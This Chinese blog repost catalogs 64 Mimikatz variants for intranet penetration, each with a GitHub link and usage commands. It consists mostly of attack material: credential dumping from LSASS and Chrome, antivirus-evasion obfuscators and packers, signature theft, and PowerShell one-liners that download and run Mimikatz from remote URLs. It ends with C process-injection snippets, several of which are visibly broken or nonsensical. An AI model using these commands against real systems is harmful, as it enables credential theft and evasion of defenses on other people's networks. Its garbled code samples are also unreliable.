【工具分享】64款Mimikatz内网渗透利器

admin 2024年5月19日01:23:45评论5 views字数 16034阅读53分26秒阅读模式
  • 0x01 免责声明

请勿使用本文中所提供的任何技术信息或代码工具进行非法测试和违法行为。若使用者利用本文中技术信息或代码工具对任何计算机系统造成的任何直接或者间接的后果及损失,均由使用者本人负责。本文所提供的技术信息或代码工具仅供于学习,一切不良后果与文章作者无关。使用者应该遵守法律法规,并尊重他人的合法权益。

  • 0x02 工具介绍

(1) go-mimikatz

go build./go-mimikatz

https://github.com/vyrus001/go-mimikatz

(2) Rusty Mimikatz

cargo build --release./target/release/mimikatz-rs

https://github.com/memN0ps/mimikatz-rs

(3) MimikatzFUD

.Invoke-M1m1fud2.ps1

https://github.com/HernanRodriguez1/MimikatzFUD

(4) pypykatz

pip install -r requirements.txtpython pypykatz.pypython pypykatz.py lsa minidump -d ./lsass.dmp sekurlsa::logonpasswordspython pypykatz.py wmi "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" sekurlsa::logonpasswords

https://github.com/skelsec/pypykatz

(5) BetterSafetyKatz

.BetterSafetyKatz.exe --DumpCreds.BetterSafetyKatz.exe --Minidump "C:WindowsTemplsass.dmp" --DumpCreds.BetterSafetyKatz.exe --RemoteWMI -Target "192.168.1.100" -Username "domainusername" -Password "password123" --DumpCreds.BetterSafetyKatz.exe --RemoteSMB -Target "192.168.1.100" -Username "domainusername" -Password "password123" --DumpCreds

https://github.com/Flangvik/BetterSafetyKatz

(6) CopyCat

.CopyCat.exe --dump --local.CopyCat.exe --memory "C:WindowsTempmemdump.raw" --dump.CopyCat.exe --hibernation "C:Windowshiberfil.sys" --dump.CopyCat.exe --dump --target "192.168.1.100" --username "domainusername" --password "password123"

https://github.com/mobdk/CopyCat

(7) PyFuscation

python3 PyFuscation.py -fvp --ps ./Scripts/Invoke-Mimikatz.ps1

https://github.com/CBHue/PyFuscation

(8) Invoke-Cats

Invoke-Cats -pwds Invoke-Cats -certs Invoke-Cats -CustomCommand

https://github.com/DanMcInerney/Invoke-Cats

(9) WinBoost

csc.exe /platform:x64 /target:exe /unsafe winboost.cs

https://github.com/mobdk/WinBoost

(10) mimidogz

.Invoke-Mimidogz.ps1

https://github.com/fir3d0g/mimidogz

(11) CoreClass

"Add" > "Existing Item". Navigate to the `CoreClass` directory and select all the `.cs` files.Add a reference to `System.Management.Automation.dll` in your project. To do this, right-click on your project in the solution explorer and select "Add" > "Reference". In the "Reference Manager" window, select "Assemblies" and search for "System.Management.Automation". Select it and click "Add".

https://github.com/mobdk/CoreClass

(12) SharpMimikatz

SharpMimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

https://github.com/XTeam-Wing/SharpMimikatz

(13) Invoke-Obfuscation

Set-ExecutionPolicy UnrestrictedImport-Module .Invoke-Obfuscation.psd1Invoke-Obfuscation -ScriptPath C:PathToMyScript.ps1 -Command All

https://github.com/danielbohannon/Invoke-Obfuscation

(14) SimpleMimikatzObfuscator

Commands.txt

https://github.com/DimopoulosElias/SimpleMimikatzObfuscator

(15) ClickOnceKatz

pip install pycryptodome requestspython build.pyHost the "publish" directory on a web server or file share accessible to the target machine.On the target machine, navigate to the URL of the ClickOnce package in a web browser.

https://github.com/sinmygit/ClickOnceKatz

(16) pymemimporter

import base64import pymemimporter# Load the base64-encoded module into memoryencoded_module = b'YOUR_BASE64_ENCODED_MODULE_HERE'module_data = base64.b64decode(encoded_module)# Import the module from memorymem_importer = pymemimporter.PyMemImporter()loaded_module = mem_importer.load_module('<module_name>', module_data)base64 -w0 <module_name>.py > <module_name>.base64python <script_name>.py

https://github.com/n1nj4sec/pymemimporter

(17) SharpDPAPI

dotnet run --project .SharpDPAPISharpDPAPI.csprojdotnet run --project .SharpDPAPISharpDPAPI.csproj masterkeysdotnet run --project .SharpDPAPISharpDPAPI.csproj domainbackupkeys

https://github.com/GhostPack/SharpDPAPI

(18) Plog

privilege::debugsekurlsa::Plog

https://github.com/GamehunterKaan/Plog

(19) StegoKatz

.StegoKatz.ps1 -Embed -FilePath <file_path> -ImagePath <image_path> -OutputPath <output_path>.StegoKatz.ps1 -Extract -ImagePath stego_image.jpg -OutputPath extracted_secret.txt

https://github.com/r13mann/StegoKatz

(20) LoadMimikatzWithDinvoke.cs

mimi.bat.rundll32-hijack.ps1

https://github.com/farzinenddo/SeveralWaysToExecuteMimikatz/blob/main/LoadMimikatzWithDinvoke.cs

(21) mimikatz-bypass

Invoke-WebRequest https://raw.githubusercontent.com/corneacristian/mimikatz-bypass/master/mimikatz-bypass.ps1 -OutFile mimikatz-bypass.ps1Set-ExecutionPolicy Unrestricted.mimikatz-bypass.ps1

https://github.com/corneacristian/mimikatz-bypass

(22) Utils

dotnet build -r win10-x64katz.exe <MIMIKATZ_COMMAND>

https://github.com/ITh4cker/Utils

(23) Eyeworm

python3 eyeworm.py -t <PAYLOAD_TYPE> -c <COMMAND> -o <OUTPUT_FILE>python3 eyeworm.py -i <INPUT_FILE> -p <PAYLOAD_FILE> -o <OUTPUT_FILE>

https://github.com/imsellbaox/Eyeworm

(24) drunkenkatz

beacon> execute-assembly /root/drunkencat.exe -i -g -k -c "python drunkenkatz.py"

https://github.com/ap3r/drunkenkatz

(25) CallBack

python3 CallBack.py -i <LOCAL_IP_ADDRESS> -p <LOCAL_PORT>

https://github.com/mobdk/CallBack

(26) mimikatz-byPass-Huorong

python mimikatz_byPass_Huorong.py

https://github.com/q1ya/mimikatz-byPass-Huorong

(26) mimikatz_bypass

python mimikatz_bypass.py

https://github.com/wangfly-me/mimikatz_bypass

(28) HTML-mimikatz-

cmd.exe mimikatz.html

https://github.com/vipserver/HTML-mimikatz-

(29) Mimikatz.exe-in-JS

cmd.exe mimikatz.js

https://github.com/hardw00t/Mimikatz.exe-in-JS

(30) -Have-You-Seen-These-Katz-

sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1sed -i -e '/<#/,/#>/c\' Invoke-Mimikatz.ps1sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1sed -i -e 's/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g' Invoke-Mimikatz.ps1sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1

https://github.com/Ninja-Tw1sT/-Have-You-Seen-These-Katz-

(31) MimiRunner

rundll32 *.log,#1

https://github.com/mobdk/MimiRunner

(32) Mimikatz-PE-Injection

powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.**** In the above command '/out:katz.exe katz.cs' the 'katz.cs' should be the path where initially powershell downloads the CS file ***powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe \share_ipshare_namekatz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.*cd %temp% && powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://gist.githubusercontent.com/analyticsearch/7b614f8badabe5bedf1d88056197db76/raw/13966117e4ba13be5da0c4dc44ac9ebfd61fe22a','katz.cs'); && cd c:WindowsMicrosoft.NETFramework64v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe %temp%\katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* && move mimikatz.log %temp%\katz.log && cd %temp% && del %temp%\katz.cs

https://github.com/analyticsearch/Mimikatz-PE-Injection

(33) ninifox

.Invoke-NiNifox.ps1

https://github.com/scottjosh/ninifox

(34) Chexport

dpapi::chrome /in:"%localappdata%GoogleChromeUser DataDefaultCookies" /unprotect`dpapi::chrome /in:"%localappdata%GoogleChromeUser DataDefaultLogin Data For Account" /unprotect`dpapi::chrome /in:"%localappdata%GoogleChromeUser DataDefaultLogin Data" /unprotect

https://github.com/GamehunterKaan/Chexport

(35) mimik

mimikatz.exemprotected.exemprotected.jpg.exemprotected.jpg.7z

https://github.com/MisterLobster22/mimik

(36) my-obfuscated-mimikatz

eric.ps1

https://github.com/lazaars/my-obfuscated-mimikatz

(37) Invoke-Mimikatz-W10

.Invoke-Mimikatz.ps1

https://github.com/VDA-Labs/Invoke-Mimikatz-W10

(38) MimiVader

python3 MimiVader.py Invoke-Mimikatz.ps1 DeceptiveFile.py

https://github.com/lawja/MimiVader

(39) Invoke-Mimikatz

.Invoke-Mimikatz

https://github.com/syn-ack-zack/Invoke-Mimikatz

(40) Invoke-Mimikatz

.invokemimikatz.ps1

https://github.com/dfirdeferred/Invoke-Mimikatz

(41) mimikatz_bypass

.XInvoke-Mimikatz.ps1.wi10_Invoke-Mimikatz.ps1

https://github.com/izj007/mimikatz_bypass

(42) JS_MimiKatzDropper

cscript.exe dropper.js

https://github.com/leinn32/JS_MimiKatzDropper

(43) mimicats

Invoke-Expression (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/Moon1705/mimicats/master/Mimicats.ps1') Invoke-Cats -Command '"privilege::debug"'

https://github.com/Moon1705/mimicats

(44) XorPacker

python3 ./xorpacker.py -f mimikatz.exe -t UNMANAGED

https://github.com/tmenochet/XorPacker

(45) PEzor

PEzor.sh -fluctuate=RW -sleep=120 mimikatz/x64/mimikatz.exe -z 2 -p '"coffee" "sleep 5000" "coffee" "exit"'

https://github.com/phra/PEzor

(46) AtomPePacker

PePacker.exe mimikatz.exe -e

https://github.com/NUL0x4C/AtomPePacker

(47) Nim-RunPE

nim c -d:args NimRunPE.nim

https://github.com/S3cur3Th1sSh1t/Nim-RunPE

(48) Nimcrypt2

nim c -d:release nimcrypt2.nim./nimcrypt2 --encrypt --keyfile=mykey.txt --inFile=plaintext.txt --outFile=ciphertext.txt

https://github.com/icyguider/Nimcrypt2

(49) ProtectMyTooling

py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

https://github.com/mgeeky/ProtectMyTooling

(50) xencrypt

Import-Module ./xencrypt.ps1 Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/the-xentropy/xencrypt

(51) BetterXencrypt

Import-Module ./betterxencrypt.ps1 Invoke-BetterXencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1

https://github.com/GetRektBoy724/BetterXencrypt

(52) AES-Encoder

Invoke-AES-Encoder -InFile invoke-mimikatz.ps1 -OutFile aesmimi.ps1

https://github.com/Chainski/AES-Encoder

(53) mortar

./encryptor -f mimikatz.exe -o bin.encdeliver.exe -d -c sekurlsa::logonpasswords -f bin.enc

https://github.com/0xsp-SRD/mortar

(54) .NET-Crypter

Browse Executable:Generate Encryption:

https://github.com/roast247/.NET-Crypter

(55) Custom mods + Invoke-Obfuscation

sed -e '/<#/,/#>/c\' "$1"sed -e 's/^[[: space: ]]*#.*$//g' "$1"sed -e 's/Invoke-Mimikatz/RainbowsAndUnicorns/g' "$1"sed -e's/DumpCreds/MoreRainbows/g' "$1"Invoke-Obfuscation -ScriptPath ‘./Invoke-Mimikatz.ps1’ -Command ‘TokenAll1Out full_power.ps1’ -QuietInvoke-Obfuscation -ScriptPath '.2.IM_critical_words.ps1' -Command ‘TokenVariable1’ -Quiet > final.ps1IEX (New-object Net. Webclient) .Downloadstring('http: //192.168.1.104:8000/final.ps1') ; RainbowsAndUnicorns -MoreRainbows

https://github.com/newlog/fud_mimikatz_talk

(56) Obfuscated_Invoke-Mimikatz

sed -i -e 's/Invoke-Mimikatz/Invoke-LSASSscraper/g' Invoke-Mimikatz.ps1sed -i -e '/<#/,/#>/c\' Invoke-Mimikatz.ps1sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions#-/g" Invoke-Mimikatz.ps1Install-Module -Name "ISESteroids" -Scope CurrentUser -Repository PSGallery –ForceImport-Module .obfuscat_Invoke-Mimikatz.ps1Invoke-LSASSscraper

https://github.com/VraiHack/Obfuscated_Invoke-Mimikatz

(57) mimikatz_encoded

certutil -decode mimikatz_encoded.bin mimikatz.exe && mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/mobx26/mimikatz_encoded

(58) Encrypted_Mimikatz

.decrypt.ps1.mimikatz.exe "sekurlsa::logonPasswords full" exit

https://github.com/Sombody101/Encrypted_Mimikatz

(59) SigThief

sigthief.py -i c: WindowsSystem32consent.exe -t mimikatz. exe -o MSCredentialTool.exe

https://github.com/secretsquirrel/SigThief

(60) memory+suspended

#include <stdio.h>#include <windows.h>const char* cmd = "powershell.exe -windowstyle hidden -command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/gentilkiwi/mimikatz/master/mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"";void obfuscate(char* str){    int len = strlen(str);    for (int i = 0; i < len; i++) {        str[i] = str[i] ^ 0x41;    }}int main(){    char* encoded_cmd = "YWxpY2UgY29tbWFuZCAtIHdpbmRvd3N0eWxlIGhpZGRlbjsgLWNvbW1hbmQgIklFWCAoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9yYXdAZ2VudGlsa2l3aS9taW1pa2F0ei9tZXRhZGF0YS9taW1pa2F0ei5wczEnKTsgSW52b2tlLU1pbWlrYXR6IC1EdW1wQ3JlZHMK"";    obfuscate(encoded_cmd);    DWORD pid = GetCurrentProcessId();    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);    if (process == NULL) {        printf("Error opening process. Error code: %lun", GetLastError());        return 1;    }    LPVOID remote_string = VirtualAllocEx(process, NULL, strlen(encoded_cmd), MEM_COMMIT, PAGE_READWRITE);    if (remote_string == NULL) {        printf("Error allocating memory. Error code: %lun", GetLastError());        CloseHandle(process);        return 1;    }    BOOL write_result = WriteProcessMemory(process, remote_string, encoded_cmd, strlen(encoded_cmd), NULL);    if (!write_result) {        printf("Error writing to process memory. Error code: %lun", GetLastError());        CloseHandle(process);        return 1;    }    HANDLE thread = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryA, remote_string, 0, NULL);    if (thread == NULL) {        printf("Error creating remote thread. Error code: %lun", GetLastError());        CloseHandle(process);        return 1;    }    WaitForSingleObject(thread, INFINITE);    VirtualFreeEx(process, remote_string, strlen(encoded_cmd), MEM_RELEASE);    CloseHandle(process);    return 0;}

(61) 0xFF和XOR异或

#include <iostream>#include <cstring>using namespace std;void obfuscate(char* s) {    for (int i = 0; s[i]; i++) {        s[i] = s[i] ^ 0xFF;    }}int main() {    char* str = new char[20];    strcpy(str, "password123");    // Obfuscate the string    obfuscate(str);    // Print the obfuscated string    cout << str << endl;    // Restore the original string    obfuscate(str);    // Print the original string    cout << str << endl;    delete[] str;    return 0;}

(62) 将每个字符与0xAA进行XOR异或

#include <stdio.h>#include <string.h>#include <stdlib.h>int main(){  char str1[] = "mimikatz.exe";  char str2[] = "powershell.exe";  char str3[] = "cmd.exe /c mimikatz.exe";  int len1 = strlen(str1);  int len2 = strlen(str2);  int len3 = strlen(str3);  for(int i = 0; i < len1; i++) {    str1[i] = str1[i] ^ 0xAA;  }  for(int i = 0; i < len2; i++) {    str2[i] = str2[i] ^ 0xAA;  }  for(int i = 0; i < len3; i++) {    str3[i] = str3[i] ^ 0xAA;  }  void* mem = VirtualAlloc(NULL, sizeof(str1) + sizeof(str2) + sizeof(str3), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);  memcpy(mem, str1, sizeof(str1));  memcpy((char*)mem + sizeof(str1), str2, sizeof(str2));  memcpy((char*)mem + sizeof(str1) + sizeof(str2), str3, sizeof(str3));  ((void(*)())mem)();  return 0;}

(63) 解码并存储在内存中

#include <iostream>#include <windows.h>int main(){    const char* encodedCmd = "x44x43x4Dx53x63x72x61x70x00x2Dx61x20x2Dx6Ex6Fx70x62x00x2Dx6Ex6Fx70x23x00x2Dx6Ex6Fx70x69x00x2Dx61x20x2Dx6Ex6Fx70x77x00x2Dx70x00x2Dx65x00x2Dx74x00x2Dx72x00x2Dx75x00x2Dx6Ex00x20x22x26x28x2Ax2Cx2Ex30x32x34x36x38x3Ax3Cx3Ex40x42x44x46x48x4Ax4Cx4Ex50x52x54x56x58x5Ax5Cx5Ex60x62x64x66x68x6Ax6Cx6Ex70x72x74x76x78x7Ax7Cx7Ex80x82x84x86x88x8Ax8Cx8Ex90x92x94x96x98x9Ax9Cx9ExA0xA2xA4xA6xA8xAAxACxAExB0xB2xB4xB6xB8xBAxBCxBExC0xC2xC4xC6xC8xCAxCCxCExD0xD2xD4xD6xD8xDAxDCxDExE0xE2xE4xE6xE8xEAxECxEExF0xF2xF4xF6xF8xFAxFCxFEx00x22";    DWORD pid;    HWND hwnd = FindWindowA(NULL, "Window Name");    GetWindowThreadProcessId(hwnd, &pid);    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);    LPVOID allocSpace = VirtualAllocEx(hProc, NULLstrlen(encodedCmd), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);    WriteProcessMemory(hProc, allocSpace, encodedCmd, strlen(encodedCmd), NULL);    HANDLE hThread = CreateRemoteThread(hProc, NULLNULL, (LPTHREAD_START_ROUTINE)allocSpace, NULLNULLNULL);    CloseHandle(hThread);    CloseHandle(hProc);    return 0;}

(64) 内存注入执行Mimikatz

#include <windows.h>#include <stdio.h>#include <stdlib.h>#include <string.h>#define MIMIKATZ_PATH "C:\path\to\mimikatz.exe"int main(){    // Load Mimikatz into memory    HANDLE hFile = CreateFileA(MIMIKATZ_PATH, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);    DWORD dwFileSize = GetFileSize(hFile, NULL);    BYTE* pbFileData = (BYTE*)malloc(dwFileSize);    DWORD dwBytesRead;    ReadFile(hFile, pbFileData, dwFileSize, &dwBytesRead, NULL);    CloseHandle(hFile);    // Allocate memory for Mimikatz    LPVOID lpMem = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);    // Copy Mimikatz to allocated memory    memcpy(lpMem, pbFileData, dwFileSize);    // Execute Mimikatz    DWORD dwExitCode;    DWORD dwThreadId;    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpMem, NULL, 0, &dwThreadId);    WaitForSingleObject(hThread, INFINITE);    GetExitCodeThread(hThread, &dwExitCode);    // Free allocated memory    VirtualFree(lpMem, 0, MEM_RELEASE);    return 0;}

原文始发于微信公众号(Matrix SEC):【工具分享】64款Mimikatz内网渗透利器

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日01:23:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【工具分享】64款Mimikatz内网渗透利器https://cn-sec.com/archives/2037540.html

发表评论

匿名网友 填写信息